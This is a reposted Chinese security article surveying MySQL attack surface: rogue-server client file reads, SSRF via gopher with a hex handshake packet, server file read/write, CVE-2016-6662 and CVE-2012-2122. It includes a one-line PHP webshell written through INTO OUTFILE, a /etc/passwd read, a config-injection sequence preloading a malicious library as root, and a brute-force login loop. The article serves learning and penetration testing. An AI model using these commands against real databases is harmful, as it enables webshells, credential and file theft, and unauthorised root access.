Python社区  »  DATABASE

Mysql 数据库攻击面

安全客 • 1 月前 • 85 次点击  

 

Mysql数据库在无论是在渗透测试还是正常使用都是比较常见的数据库,在十一假期期间总结梳理了mysql近些年的常见攻击利用方法,通过自己的实践分析也有了更深刻的认识,希望能对大家有帮助,这里分享给大家。

 

简单介绍

MySQL 是最流行的关系型数据库管理系统,在 WEB 应用方面 MySQL 是最好的 RDBMS(Relational Database Management System:关系数据库管理系统)应用软件之一。

MySQL 是一个关系型数据库管理系统,由瑞典 MySQL AB 公司开发,目前属于 Oracle 公司。MySQL 是一种关联数据库管理系统,关联数据库将数据保存在不同的表中,而不是将所有数据放在一个大仓库内,这样就增加了速度并提高了灵活性。

 

基础指令

在mysql的正常使用中以及mysql数据库攻击利用时,以下指令最常用,总结梳理如下

0x1 创建

create database hehe;//创建数据库
CREATE TABLE IF NOT EXISTS `runoob_tbl`( `runoob_id` INT UNSIGNED AUTO_INCREMENT, `runoob_title` VARCHAR(100) NOT NULL, `runoob_author` VARCHAR(40) NOT NULL, `submission_date` DATE, PRIMARY KEY ( `runoob_id` ))ENGINE=InnoDB DEFAULT CHARSET=utf8;//创建数据表


0x2 查看




    
show databases;show tables;show variables like '%secure%'; //查看安全属性
LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test FIELDS TERMINATED BY '\n';//读取客户端文件


0x3 更新添加用户及权限

CREATE USER 'username'@'host' IDENTIFIED BY 'password';GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;DROP USER 'username'@'host';flush privileges;


0x4 文件读写

SELECT ' system($_GET[\'c\']); ?>' INTO OUTFILE '/var/www/shell.php';SELECT LOAD_FILE('/var/lib/mysql-files/aaa') AS Result;select group_concat(id) from test INTO DUMPFILE "/var/lib/mysql-files/aaaa";

 

攻击面分析

0x1 Mysql 客户端任意文件读

适用范围:全版本 MySQL/MariaDB Client
条件:客户端连接时开启 –enable-local-infile

从结果上来看,客户端读取了自身指定的数据,抓取数据包分析整个流程。

1. Client Send 3306

192.168.0.114 是SqlServer 192.168.0.115为客户端

2. Server Send Greeting packet

服务端返回一个server端基础信息表包含版本,协议类型,salt值,server 功能项

这里有一个server 功能表

3. Client Auth and Send capability

这个包可以说是客户端的登录包,包含用户名,密码,还有一份客户端能力表。

从图中可以看出client连接时开启了 —enable-local-infile 配置

4. Client Queries

接下来就是一些正常的客户端查询了

5. Client Send LOAD DATA LOCAL

最终客户端发送下面指令

6. Server Send Filename

服务端收到这个执行语句后会给客户端以特定的协议格式发送一个包,类似于下面,功能类似于告诉客户端把这个文件发给我让我看看,如果连接时配置 –enable-local-infile 或者dsn 加上了allowAllFiles=true

7. 其他

攻击脚本 Rogue_Mysql https://github.com/allyshka/Rogue-MySql-Server

PHP有一些mysql客户端扩展,如mysql、mysqli、pdo,除了pdo外都可以被利用,因为pdo默认禁止读取本地数据,你需要通过设置PDO::MYSQL_ATTR_LOCAL_INFILE为true来启用本地数据读取。同样的,如果客户端使用的是python的MySQLdb,也需要先设置local_infile连接选项。


0x2 利用SSRF 攻击Mysql

适用范围:全版本 MySQL/MariaDB Server
条件:拥有空密码用户

在之前有道ctf题目利用gopher协议获取mysql数据库中的flag,这里需要了解mysql的完整交互协议,并且要伪造客户端,通过ssrf进行交互连接。下面只需要分析mysql的数据交互过程。

主要分成三个部分:登录认证报文,客户端请求报文以及服务器端返回报,基于mysql5.1.73(mysql4.1以后的版本)

  1. TCP 三次握手

  2. 服务端发送握手初始化报文

  3. 客户端发送认证报文

  4. 服务端发送认证结果报文

  5. 客户端发送命令报文

1. TCP 三次握手

客户端与服务端进行TCP握手连接,确定连接信息。

2. 服务端发送握手初始化报文

握手完成之后,服务端向客户端发送mysql相关信息,

通过该数据包客户端将获取服务端提供的能力列表,以及获取挑战随机数,这将会在之后的客户端认证数据包中使用到。

3. 客户端发送认证报文

服务端生成挑战数(scramble)并发送给客户端,客户端用挑战数加密密码后返回相应结果,然后服务器检查是否与预期的结果相同,从而完成用户认证的过程。值得注意的是,如果mysql的密码为空,那么加密密码就为空。

客户端收到服务器发来的初始化报文后,会对服务器发送的权能标志进行修改,保留自身所支持的功能,然后将权能标志返回给服务器,从而保证服务器与客户端通讯的兼容性。

4. 服务端发送认证结果报文

mysql收到了客户端发过来的认证包,并且经过验证用户名密码都是正确的,这是客户端被允许登陆了,报文结构如下:

header = 0,表明是ok报文, server status = 02,表名设置自动提交成功。

5. 客户端发送命令报文

命令报文比较简单,第一个字节表示当前命令的类型,之后的数据就是要执行的命令。

6. 构造数据包

因为没有密码的用户登陆mysql时不需要与sqlserver进行交互所以可以通过gopher协议通过一个数据包完成所有的交互,实现执行命令的目的。

通过命令行执行mysql -h 127.0.0.1 -u root -e "select now();"

利用wireshark 抓包获取

我们只关心,数据包中的红色客户端部分,将它们都提取出来,通过nc发送数据包

data = "b500000185a2bf01000000012d0000000000000000000000000000000000000000000000726f6f74000063616368696e675f736861325f70617373776f72640078035f6f73086f737831302e3134095f706c6174666f726d067838365f36340f5f636c69656e745f76657273696f6e06382e302e31380c5f636c69656e745f6e616d65086c69626d7973716c045f706964053432343831076f735f757365720634637431306e0c70726f6772616d5f6e616d65056d7973716c00000003210000000373656c65637420404076657273696f6e5f636f6d6d656e74206c696d697420310d0000000373656c656374206e6f772829"print data.decode("hex")

如果要执行其他命令只需要修改其中的客户端命令数据包。


0x3 Mysql 服务端文件读写

适用范围:全版本 MySQL/MariaDB Client
条件:服务端配置可读写目录和正确的用户权限

1. 安全保护

mysql服务端的文件读取有很多的条件限制,主要是mysql数据库的配置,为了安全原因,当读取位于服务器上的文本文件时,文件必须处于数据库目录或可被所有人读取。你可以通过执行show variables like '%secure%'来查看:

secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, DUMPFILE and LOAD_FILE()可以操作的文件夹。

secure-file-priv的值可分为三种情况:

  1. secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出

  2. 当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下,此时如果读写发生在其他文件夹,就会报错

  3. 当secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制

除此之外读取或写入文件必须拥有可操作的用户权限否则会报错:

ERROR 1045 (28000): Access denied for user

2. 读取文件

SELECT LOAD_FILE('/var/lib/mysql-files/aaa') AS Result;
create database test;CREATE TABLE test ( id TEXT, content TEXT);load data infile "/var/lib/mysql-files/aaa" into table test.test FIELDS TERMINATED BY '\n\r';

3. 写入文件

select group_concat(id) from test INTO DUMPFILE "/var/lib/mysql-files/aaaa";


0x4 Mysql远程代码执行/权限提升漏洞 (CVE-2016-6662)

版本范围:MySQL <= 5.7.14 MySQL <= 5.6.32 MySQL <= 5.5.51, 远程代码执行/ 提权 (0day),包括mysql的分支版本MariaDB,PerconaDB

利用条件要具有FILE和SELECT权限的mysql的用户且能够访问日志功能(通常情况下只有MYSQL的管理员用户具有)

1. 漏洞原因

  • MySQL的默认安装包里自带了一个mysqld_safe的脚本用来启动mysql的服务进程

  • 该进程能够在启动mysql server之前预加载共享库文件,通过参数 –malloc-lib = LIB /usr/local/mysql/bin/mysqld_safe:

  • 一旦攻击者可以注入恶意库文件在my.cnf文件中,即可在mysql服务重启时以root权限执行预加载的任意共享库中的任意代码

2. 利用场景

  • 在MYSQL已存在的具有弱权限或者权限设置不安全的配置文件(mysql用户可写)里注入恶意代码

  • 在MYSQL的data目录里(mysql用户默认可写)创建一个新的配置文件my.cnf,并注入恶意代码

3. 漏洞利用

首先通过sql查询创建配置文件

mysql> set global general_log_file = '/usr/local/mysql/data/my.cnf';mysql> set global general_log = on;mysql> select '    '>     '> ; injected config entry    '>     '> [mysqld]    '> malloc_lib=/tmp/exploit.so    '>     '> [separator]    '>     '> ';1 row in set (0.00 sec)mysql> set global general_log = off;

之后重启mysql服务,即可执行tmp文件夹下的exploit.so文件


0x5 Mysql 身份认证绕过漏洞(CVE-2012-2122)

版本范围 :
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。

漏洞复现 https://github.com/vulhub/vulhub/tree/master/mysql/CVE-2012-2122 直接搭建docker环境

在不知道我们环境正确密码的情况下,在bash下运行如下命令,在一定数量尝试后便可成功登录:

for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306 ; done


总结

总结了mysql客户端任意文件读取利用、利用SSRF攻击Mysql数据库获取数据、SQL注入中文件读写利用、特定版本Mysql提取获取shell漏洞以及很古老的mysql身份绕过认证,这些攻击技巧是之前频繁出现的利用方法,后续将分析关于postgres等数据的攻击利用方法。

 

参考文献

http://www.nsoad.com/Article/Vulnerabilityanalysis/20160913/391.html
https://www.freebuf.com/articles/web/159342.html
https://www.anquanke.com/post/id/84553
https://www.imooc.com/article/258850?block_id=tuijian_wz
https://blog.csdn.net/weixin_34255793/article/details/90309996

(请点击“阅读原文”查看链接)


- End -
精彩推荐

CISCN 2020 Final Day2 pwn3思路分享

Fastjson < 1.2.68版本反序列化漏洞分析篇

安全客季刊正式发布 | 戳这里、读季刊赢好礼吧~

通过HackerOne漏洞报告学习PostMessage漏洞实战场景中的利用与绕过


戳“阅读原文”查看更多内容
Python社区是高质量的Python/Django开发社区
本文地址:http://www.python88.com/topic/74563
 
85 次点击  
分享到微博